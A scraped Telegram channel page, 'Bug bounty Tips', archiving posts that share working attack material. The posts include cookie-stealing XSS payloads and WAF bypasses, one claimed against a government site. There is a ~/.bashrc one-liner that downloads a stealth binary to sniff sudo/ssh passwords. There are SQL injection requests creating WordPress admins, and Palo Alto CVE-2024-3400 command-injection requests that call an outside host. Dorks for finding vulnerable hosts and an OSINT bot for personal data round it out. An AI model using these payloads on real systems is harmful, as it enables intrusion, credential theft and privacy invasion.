Bug bounty Tips

Відкрити в Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Індія57 495 Технології та додатки17 373

5 846

Підписники

+1624 години

+677 днів

+37530 день

473

Перегляди допису

~ 24224 години

~ 32348 годин

8.10%

Коефіцієнт залучення

~ 3

Дописів на день

Ads index

beta

Архів дописів

5 848

mile2 | Certified Professional Ethical Hacker Info : https://mile2.com/cpeh_outline

5 848

Over 50,000 hosts for Tinyproxy are found vulnerable to CVE-2023-49606

"A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution," Talos said in an advisory last week. "An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability."

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889

5 848

Here is a PoC (proof-of-concept) for CVE-2023-40000. You can now replicate the attack ❤️ https://github.com/rxerium/CVE-2023-40000

5 848

LiteSpeed Cache has a flaw which allows users to create WP (word press) admin accounts CVE-2023-40000

5 848

Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check and give a feedback

5 848

here is Complete SSRF Guide

Very Good Guide For Beginner to Advance User. Make you Stronger in Finding SSRF

Hit a Like 👍

5 848

Bypassed strong Akamai WAF of Usa Department of Justice payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

5 848

this list contains all top working xss bypass including top hunters succeser payloads..this will sure help you must try it and dont forget to mention me if anyone in this list payload work for you and i know 100% its work ❤️ it takes me so much time to collect all top payloads collected from linkdin twitter github with all success rate every payload in this list is worked for someone and also for me in real bounty programs ! most of payloads are for cloudflare waf bypass so try it when you blocked by cloudflare waf..

5 848

wafbypass.txt0.08 KB

5 848

CloudFlare XSS protection WAF Bypassed ! payload used: <Img Src=OnXSS OnError=confirm(document.cookie)> #bugbounty #infosec

5 848

😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ] A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'

🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking 🐥 [ tweet ] прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger

5 848

👩‍💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9) Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. Adding a new WordPress user:

q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28

Giving the user admin rights:

q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c

PWNED! Note: Param "integ" is the md5sum of the query. 6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22 Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12

5 848

CVE-2024-3400 Palo Alto OS Command Injection Send this HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

You will create hellome1337.txt file on the server with root access. Now if you try to access the files you should receive 403 insted of 404 Command Injection:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Fofa

app="paloalto-GlobalProtect"
https://en.fofa.info/result?qbase64=YXBwPSJwYWxvYWx0by1HbG9iYWxQcm90ZWN0Ig%3D%3D

Zoomeye

app:"Palo Alto Networks firewall httpd"
https://www.zoomeye.hk/searchResult?q=app%3A%22Palo%20Alto%20Networks%20firewall%20httpd%22&from=5o6o54m5MjQwNDE0MDE=

Hunter.how

product.name="GlobalProtect Portal"
https://hunter.how/list?searchValue=product.name%3D%22GlobalProtect%20Portal%22

Shodan

http.favicon.hash:-631559155

More Info : https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ https://github.com/h4x0r-dz/CVE-2024-3400 https://github.com/W01fh4cker/CVE-2024-3400-RCE

5 848

today i reported a admin bypass it was very easy, first it as admin.x.com i checked it and i checked for /dashboard and it loaded but automatically got logged out, and i tried other directories /dashboard ---> redirected to /login

5 848

Binary Exploitation Notes

Stack Heap Kernel Browser Exploitation

https://ir0nstone.gitbook.io/notes credit : Andrej Ljubic

5 848

Story of very quick RCE 📝 • Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 You can to add this paths for ur wordlist • cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 • cgi-bin/reset.cgi?db_prefix=%26id%26 fuzzing as well • cgi-bin/FUZZ.cgi?FUZZ=%26id%26 #bugbountytips ❤️

5 848

JS Key Strings for JS Hacking CC - Jhaddix #bugbounty #Infosec #bugbountytips

5 848

Path Traversal Affecting Multiple CData Products CRITICAL SRC: https://tenable.com/security/research/tra-2024-09 PoC: 👆

5 848

$🚨 XSS Hunting from WaybackURLS 🔍 Payload : waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sor$

🚨 XSS Hunting from WaybackURLS 🔍 Payload :

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/$=[^&]*$/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss

credit : gudetama_bf #bugbountytips #bugbounty